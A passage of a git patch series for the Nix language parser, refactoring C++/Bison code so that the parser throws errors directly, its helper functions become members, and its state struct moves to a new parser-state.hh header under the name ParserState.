--- src/libexpr/parser.y | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index b7b25854b..44fae6880 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -18,6 +18,7 @@ #include +#include "finally.hh" #include "util.hh" #include "users.hh" @@ -60,7 +61,6 @@ namespace nix { Expr * result; SourcePath basePath; PosTable::Origin origin; - std::optional error; }; } @@ -315,10 +315,10 @@ static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * error) { - data->error = { + throw ParseError({ .msg = hintfmt(error), .errPos = data->state.positions[makeCurPos(*loc, data)] - }; + }); } @@ -689,11 +689,10 @@ Expr * EvalState::parse( }; yylex_init(&scanner); - yy_scan_buffer(text, length, scanner); - int res = yyparse(scanner, &data); - yylex_destroy(scanner); + Finally _destroy([&] { yylex_destroy(scanner); }); - if (res) throw ParseError(data.error.value()); + yy_scan_buffer(text, length, scanner); + yyparse(scanner, &data); data.result->bindVars(*this, staticEnv); From 1b09b80afac27c67157d4b315c237fa7bb9b8d08 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 264/654] make parser utility functions members of ParseData all of them need access to parser state in some way. make them members to allow this without fussing so much. --- src/libexpr/parser.y | 126 ++++++++++++++++++++++--------------------- 1 file changed, 66 insertions(+), 60 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 44fae6880..beb660e36 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -27,6 +27,15 @@ #include "eval-settings.hh" #include "globals.hh" +// using C a struct allows us to avoid having to define the special +// members that using string_view here would implicitly delete. 
+struct StringToken { + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } +}; + namespace nix { #define YYLTYPE ::nix::ParserLocation @@ -61,19 +70,18 @@ namespace nix { Expr * result; SourcePath basePath; PosTable::Origin origin; + + void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); + void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); + void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); + Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); + Expr * stripIndentation(const PosIdx pos, + std::vector>> && es); + PosIdx makeCurPos(const ParserLocation & loc); }; } -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } -}; - #define YY_DECL int yylex \ (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParseData * data) @@ -94,7 +102,7 @@ using namespace nix; namespace nix { -static void dupAttr(const EvalState & state, const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) +void ParseData::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", @@ -103,7 +111,7 @@ static void dupAttr(const EvalState & state, const AttrPath & attrPath, const Po }); } -static void dupAttr(const EvalState & state, Symbol attr, const PosIdx pos, const PosIdx prevPos) +void ParseData::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), @@ -112,8 +120,7 @@ static void dupAttr(const EvalState & state, Symbol attr, const PosIdx pos, cons } -static void 
addAttr(ExprAttrs * attrs, AttrPath && attrPath, - Expr * e, const PosIdx pos, const nix::EvalState & state) +void ParseData::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) { AttrPath::iterator i; // All attrpaths have at least one attr @@ -126,10 +133,10 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, if (j != attrs->attrs.end()) { if (!j->second.inherited) { ExprAttrs * attrs2 = dynamic_cast(j->second.e); - if (!attrs2) dupAttr(state, attrPath, pos, j->second.pos); + if (!attrs2) dupAttr(attrPath, pos, j->second.pos); attrs = attrs2; } else - dupAttr(state, attrPath, pos, j->second.pos); + dupAttr(attrPath, pos, j->second.pos); } else { ExprAttrs * nested = new ExprAttrs; attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); @@ -156,12 +163,12 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, for (auto & ad : ae->attrs) { auto j2 = jAttrs->attrs.find(ad.first); if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. - dupAttr(state, ad.first, j2->second.pos, ad.second.pos); + dupAttr(ad.first, j2->second.pos, ad.second.pos); jAttrs->attrs.emplace(ad.first, ad.second); } jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); } else { - dupAttr(state, attrPath, pos, j->second.pos); + dupAttr(attrPath, pos, j->second.pos); } } else { // This attr path is not defined. Let's create it. 
@@ -174,8 +181,7 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, } -static Formals * validateFormals(ParseData & data, Formals * formals, - PosIdx pos = noPos, Symbol arg = {}) +Formals * ParseData::validateFormals(Formals * formals, PosIdx pos, Symbol arg) { std::sort(formals->formals.begin(), formals->formals.end(), [] (const auto & a, const auto & b) { @@ -191,21 +197,21 @@ static Formals * validateFormals(ParseData & data, Formals * formals, } if (duplicate) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[duplicate->first]), - .errPos = data.state.positions[duplicate->second] + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .errPos = state.positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[arg]), - .errPos = data.state.positions[pos] + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .errPos = state.positions[pos] }); return formals; } -static Expr * stripIndentation(const PosIdx pos, SymbolTable & symbols, +Expr * ParseData::stripIndentation(const PosIdx pos, std::vector>> && es) { if (es.empty()) return new ExprString(""); @@ -302,12 +308,12 @@ static Expr * stripIndentation(const PosIdx pos, SymbolTable & symbols, } -static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) +PosIdx ParseData::makeCurPos(const ParserLocation & loc) { - return data->state.positions.add(data->origin, loc.first_line, loc.first_column); + return state.positions.add(origin, loc.first_line, loc.first_column); } -#define CUR_POS makeCurPos(*yylocp, data) +#define CUR_POS data->makeCurPos(*yylocp) } @@ -317,7 +323,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err { throw ParseError({ .msg = hintfmt(error), - .errPos = data->state.positions[makeCurPos(*loc, data)] + .errPos = 
data->state.positions[data->makeCurPos(*loc)] }); } @@ -387,16 +393,16 @@ expr_function : ID ':' expr_function { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { $$ = new ExprLambda(CUR_POS, validateFormals(*data, $2), $5); } + { $$ = new ExprLambda(CUR_POS, data->validateFormals($2), $5); } | '{' formals '}' '@' ID ':' expr_function { auto arg = data->symbols.create($5); - $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $2, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $4, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -423,21 +429,21 @@ expr_op | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(data->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(makeCurPos(@2, data), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(makeCurPos(@2, data), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(makeCurPos(@2, data), $1, $3); } - | expr_op UPDATE expr_op { $$ = new 
ExprOpUpdate(makeCurPos(@2, data), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(data->makeCurPos(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(data->makeCurPos(@2), $1, $3); } + | expr_op IMPL expr_op { $$ = new ExprOpImpl(data->makeCurPos(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(data->makeCurPos(@2), $1, $3); } | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(makeCurPos(@2, data), false, new std::vector >({{makeCurPos(@1, data), $1}, {makeCurPos(@3, data), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(makeCurPos(@2, data), $1, $3); } + { $$ = new ExprConcatStrings(data->makeCurPos(@2), false, new std::vector >({{data->makeCurPos(@1), $1}, {data->makeCurPos(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } + | 
expr_op '/' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(data->makeCurPos(@2), $1, $3); } | expr_app ; @@ -476,12 +482,12 @@ expr_simple | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { - $$ = stripIndentation(CUR_POS, data->symbols, std::move(*$2)); + $$ = data->stripIndentation(CUR_POS, std::move(*$2)); delete $2; } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {makeCurPos(@1, data), $1}); + $2->insert($2->begin(), {data->makeCurPos(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { @@ -520,13 +526,13 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(makeCurPos(@2, data), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(makeCurPos(@1, data), $2); } + { $$ = $1; $1->emplace_back(data->makeCurPos(@2), new ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(data->makeCurPos(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(makeCurPos(@1, data), new ExprString(std::string($1))); - $$->emplace_back(makeCurPos(@2, data), $3); + $$->emplace_back(data->makeCurPos(@1), new ExprString(std::string($1))); + $$->emplace_back(data->makeCurPos(@2), $3); } ; @@ -551,19 +557,19 @@ path_start ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $3); } + : ind_string_parts 
IND_STR { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; addAttr($$, std::move(*$2), $4, makeCurPos(@2, data), data->state); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; data->addAttr($$, std::move(*$2), $4, data->makeCurPos(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - dupAttr(data->state, i.symbol, makeCurPos(@3, data), $$->attrs[i.symbol].pos); - auto pos = makeCurPos(@3, data); + data->dupAttr(i.symbol, data->makeCurPos(@3), $$->attrs[i.symbol].pos); + auto pos = data->makeCurPos(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -573,12 +579,12 @@ binds /* !!! Should ensure sharing of the expression in $4. */ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - dupAttr(data->state, i.symbol, makeCurPos(@6, data), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), makeCurPos(@6, data))); + data->dupAttr(i.symbol, data->makeCurPos(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), data->makeCurPos(@6))); } delete $6; } - | { $$ = new ExprAttrs(makeCurPos(@0, data)); } + | { $$ = new ExprAttrs(data->makeCurPos(@0)); } ; attrs @@ -592,7 +598,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = data->state.positions[makeCurPos(@2, data)] + .errPos = data->state.positions[data->makeCurPos(@2)] }); } | { $$ = new AttrPath; } From 007605616477f4f0d8a0064c375b1d3cf6188ac5 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 265/654] move ParseData to own header, rename to ParserState 
ParserState better describes what this struct really is. the parser really does modify its state (most notably position and symbol tables), so calling it that rather than obliquely "data" (which implies being input only) makes sense. --- src/libexpr/lexer.l | 17 +- src/libexpr/parser-state.hh | 262 +++++++++++++++++++++++ src/libexpr/parser.y | 413 +++++++----------------------------- 3 files changed, 339 insertions(+), 353 deletions(-) create mode 100644 src/libexpr/parser-state.hh diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index 9addb3ae8..cfd61c90e 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -29,12 +29,7 @@ using namespace nix; namespace nix { -static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) -{ - return data->state.positions.add(data->origin, loc.first_line, loc.first_column); -} - -#define CUR_POS makeCurPos(*yylloc, data) +#define CUR_POS state->makeCurPos(*yylloc) static void initLoc(YYLTYPE * loc) { @@ -153,7 +148,7 @@ or { return OR_KW; } } catch (const boost::bad_lexical_cast &) { throw ParseError({ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); } return INT_LIT; @@ -163,7 +158,7 @@ or { return OR_KW; } if (errno != 0) throw ParseError({ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); return FLOAT_LIT; } @@ -186,7 +181,7 @@ or { return OR_KW; } /* It is impossible to match strings ending with '$' with one regex because trailing contexts are only valid at the end of a rule. (A sane but undocumented limitation.) 
*/ - yylval->str = unescapeStr(data->symbols, yytext, yyleng); + yylval->str = unescapeStr(state->symbols, yytext, yyleng); return STR; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } @@ -214,7 +209,7 @@ or { return OR_KW; } return IND_STR; } \'\'\\{ANY} { - yylval->str = unescapeStr(data->symbols, yytext + 2, yyleng - 2); + yylval->str = unescapeStr(state->symbols, yytext + 2, yyleng - 2); return IND_STR; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } @@ -292,7 +287,7 @@ or { return OR_KW; } <> { throw ParseError({ .msg = hintfmt("path has a trailing slash"), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh new file mode 100644 index 000000000..b33311743 --- /dev/null +++ b/src/libexpr/parser-state.hh @@ -0,0 +1,262 @@ +#pragma once + +#include "eval.hh" + +namespace nix { + +// using C a struct allows us to avoid having to define the special +// members that using string_view here would implicitly delete. 
+struct StringToken { + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } +}; + +struct ParserLocation { + int first_line, first_column; + int last_line, last_column; + + // backup to recover from yyless(0) + int stashed_first_line, stashed_first_column; + int stashed_last_line, stashed_last_column; + + void stash() { + stashed_first_line = first_line; + stashed_first_column = first_column; + stashed_last_line = last_line; + stashed_last_column = last_column; + } + + void unstash() { + first_line = stashed_first_line; + first_column = stashed_first_column; + last_line = stashed_last_line; + last_column = stashed_last_column; + } +}; + +struct ParserState { + EvalState & state; + SymbolTable & symbols; + Expr * result; + SourcePath basePath; + PosTable::Origin origin; + + void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); + void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); + void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); + Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); + Expr * stripIndentation(const PosIdx pos, + std::vector>> && es); + PosIdx makeCurPos(const ParserLocation & loc); +}; + +inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) +{ + throw ParseError({ + .msg = hintfmt("attribute '%1%' already defined at %2%", + showAttrPath(state.symbols, attrPath), state.positions[prevPos]), + .errPos = state.positions[pos] + }); +} + +inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) +{ + throw ParseError({ + .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), + .errPos = state.positions[pos] + }); +} + +inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) +{ + AttrPath::iterator i; + // All attrpaths have at 
least one attr + assert(!attrPath.empty()); + // Checking attrPath validity. + // =========================== + for (i = attrPath.begin(); i + 1 < attrPath.end(); i++) { + if (i->symbol) { + ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); + if (j != attrs->attrs.end()) { + if (!j->second.inherited) { + ExprAttrs * attrs2 = dynamic_cast(j->second.e); + if (!attrs2) dupAttr(attrPath, pos, j->second.pos); + attrs = attrs2; + } else + dupAttr(attrPath, pos, j->second.pos); + } else { + ExprAttrs * nested = new ExprAttrs; + attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); + attrs = nested; + } + } else { + ExprAttrs *nested = new ExprAttrs; + attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, nested, pos)); + attrs = nested; + } + } + // Expr insertion. + // ========================== + if (i->symbol) { + ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); + if (j != attrs->attrs.end()) { + // This attr path is already defined. However, if both + // e and the expr pointed by the attr path are two attribute sets, + // we want to merge them. + // Otherwise, throw an error. + auto ae = dynamic_cast(e); + auto jAttrs = dynamic_cast(j->second.e); + if (jAttrs && ae) { + for (auto & ad : ae->attrs) { + auto j2 = jAttrs->attrs.find(ad.first); + if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. + dupAttr(ad.first, j2->second.pos, ad.second.pos); + jAttrs->attrs.emplace(ad.first, ad.second); + } + jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); + } else { + dupAttr(attrPath, pos, j->second.pos); + } + } else { + // This attr path is not defined. Let's create it. 
+ attrs->attrs.emplace(i->symbol, ExprAttrs::AttrDef(e, pos)); + e->setName(i->symbol); + } + } else { + attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, e, pos)); + } +} + +inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Symbol arg) +{ + std::sort(formals->formals.begin(), formals->formals.end(), + [] (const auto & a, const auto & b) { + return std::tie(a.name, a.pos) < std::tie(b.name, b.pos); + }); + + std::optional> duplicate; + for (size_t i = 0; i + 1 < formals->formals.size(); i++) { + if (formals->formals[i].name != formals->formals[i + 1].name) + continue; + std::pair thisDup{formals->formals[i].name, formals->formals[i + 1].pos}; + duplicate = std::min(thisDup, duplicate.value_or(thisDup)); + } + if (duplicate) + throw ParseError({ + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .errPos = state.positions[duplicate->second] + }); + + if (arg && formals->has(arg)) + throw ParseError({ + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .errPos = state.positions[pos] + }); + + return formals; +} + +inline Expr * ParserState::stripIndentation(const PosIdx pos, + std::vector>> && es) +{ + if (es.empty()) return new ExprString(""); + + /* Figure out the minimum indentation. Note that by design + whitespace-only final lines are not taken into account. (So + the " " in "\n ''" is ignored, but the " " in "\n foo''" is.) */ + bool atStartOfLine = true; /* = seen only whitespace in the current line */ + size_t minIndent = 1000000; + size_t curIndent = 0; + for (auto & [i_pos, i] : es) { + auto * str = std::get_if(&i); + if (!str || !str->hasIndentation) { + /* Anti-quotations and escaped characters end the current start-of-line whitespace. 
*/ + if (atStartOfLine) { + atStartOfLine = false; + if (curIndent < minIndent) minIndent = curIndent; + } + continue; + } + for (size_t j = 0; j < str->l; ++j) { + if (atStartOfLine) { + if (str->p[j] == ' ') + curIndent++; + else if (str->p[j] == '\n') { + /* Empty line, doesn't influence minimum + indentation. */ + curIndent = 0; + } else { + atStartOfLine = false; + if (curIndent < minIndent) minIndent = curIndent; + } + } else if (str->p[j] == '\n') { + atStartOfLine = true; + curIndent = 0; + } + } + } + + /* Strip spaces from each line. */ + auto * es2 = new std::vector>; + atStartOfLine = true; + size_t curDropped = 0; + size_t n = es.size(); + auto i = es.begin(); + const auto trimExpr = [&] (Expr * e) { + atStartOfLine = false; + curDropped = 0; + es2->emplace_back(i->first, e); + }; + const auto trimString = [&] (const StringToken & t) { + std::string s2; + for (size_t j = 0; j < t.l; ++j) { + if (atStartOfLine) { + if (t.p[j] == ' ') { + if (curDropped++ >= minIndent) + s2 += t.p[j]; + } + else if (t.p[j] == '\n') { + curDropped = 0; + s2 += t.p[j]; + } else { + atStartOfLine = false; + curDropped = 0; + s2 += t.p[j]; + } + } else { + s2 += t.p[j]; + if (t.p[j] == '\n') atStartOfLine = true; + } + } + + /* Remove the last line if it is empty and consists only of + spaces. */ + if (n == 1) { + std::string::size_type p = s2.find_last_of('\n'); + if (p != std::string::npos && s2.find_first_not_of(' ', p + 1) == std::string::npos) + s2 = std::string(s2, 0, p + 1); + } + + es2->emplace_back(i->first, new ExprString(std::move(s2))); + }; + for (; i != es.end(); ++i, --n) { + std::visit(overloaded { trimExpr, trimString }, i->second); + } + + /* If this is a single string, then don't do a concatenation. 
*/ + if (es2->size() == 1 && dynamic_cast((*es2)[0].second)) { + auto *const result = (*es2)[0].second; + delete es2; + return result; + } + return new ExprConcatStrings(pos, true, es2); +} + +inline PosIdx ParserState::makeCurPos(const ParserLocation & loc) +{ + return state.positions.add(origin, loc.first_line, loc.first_column); +} + +} diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index beb660e36..7ce493df5 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -5,9 +5,9 @@ %defines /* %no-lines */ %parse-param { void * scanner } -%parse-param { nix::ParseData * data } +%parse-param { nix::ParserState * state } %lex-param { void * scanner } -%lex-param { nix::ParseData * data } +%lex-param { nix::ParserState * state } %expect 1 %expect-rr 1 @@ -26,64 +26,11 @@ #include "eval.hh" #include "eval-settings.hh" #include "globals.hh" - -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } -}; - -namespace nix { +#include "parser-state.hh" #define YYLTYPE ::nix::ParserLocation - struct ParserLocation - { - int first_line, first_column; - int last_line, last_column; - - // backup to recover from yyless(0) - int stashed_first_line, stashed_first_column; - int stashed_last_line, stashed_last_column; - - void stash() { - stashed_first_line = first_line; - stashed_first_column = first_column; - stashed_last_line = last_line; - stashed_last_column = last_column; - } - - void unstash() { - first_line = stashed_first_line; - first_column = stashed_first_column; - last_line = stashed_last_line; - last_column = stashed_last_column; - } - }; - - struct ParseData - { - EvalState & state; - SymbolTable & symbols; - Expr * result; - SourcePath basePath; - PosTable::Origin origin; - - void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx 
prevPos); - void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); - void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); - Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); - Expr * stripIndentation(const PosIdx pos, - std::vector>> && es); - PosIdx makeCurPos(const ParserLocation & loc); - }; - -} - #define YY_DECL int yylex \ - (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParseData * data) + (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParserState * state) #endif @@ -98,232 +45,14 @@ YY_DECL; using namespace nix; - -namespace nix { +#define CUR_POS state->makeCurPos(*yylocp) -void ParseData::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) -{ - throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", - showAttrPath(state.symbols, attrPath), state.positions[prevPos]), - .errPos = state.positions[pos] - }); -} - -void ParseData::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) -{ - throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), - .errPos = state.positions[pos] - }); -} - - -void ParseData::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) -{ - AttrPath::iterator i; - // All attrpaths have at least one attr - assert(!attrPath.empty()); - // Checking attrPath validity. 
- // =========================== - for (i = attrPath.begin(); i + 1 < attrPath.end(); i++) { - if (i->symbol) { - ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); - if (j != attrs->attrs.end()) { - if (!j->second.inherited) { - ExprAttrs * attrs2 = dynamic_cast(j->second.e); - if (!attrs2) dupAttr(attrPath, pos, j->second.pos); - attrs = attrs2; - } else - dupAttr(attrPath, pos, j->second.pos); - } else { - ExprAttrs * nested = new ExprAttrs; - attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); - attrs = nested; - } - } else { - ExprAttrs *nested = new ExprAttrs; - attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, nested, pos)); - attrs = nested; - } - } - // Expr insertion. - // ========================== - if (i->symbol) { - ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); - if (j != attrs->attrs.end()) { - // This attr path is already defined. However, if both - // e and the expr pointed by the attr path are two attribute sets, - // we want to merge them. - // Otherwise, throw an error. - auto ae = dynamic_cast(e); - auto jAttrs = dynamic_cast(j->second.e); - if (jAttrs && ae) { - for (auto & ad : ae->attrs) { - auto j2 = jAttrs->attrs.find(ad.first); - if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. - dupAttr(ad.first, j2->second.pos, ad.second.pos); - jAttrs->attrs.emplace(ad.first, ad.second); - } - jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); - } else { - dupAttr(attrPath, pos, j->second.pos); - } - } else { - // This attr path is not defined. Let's create it. 
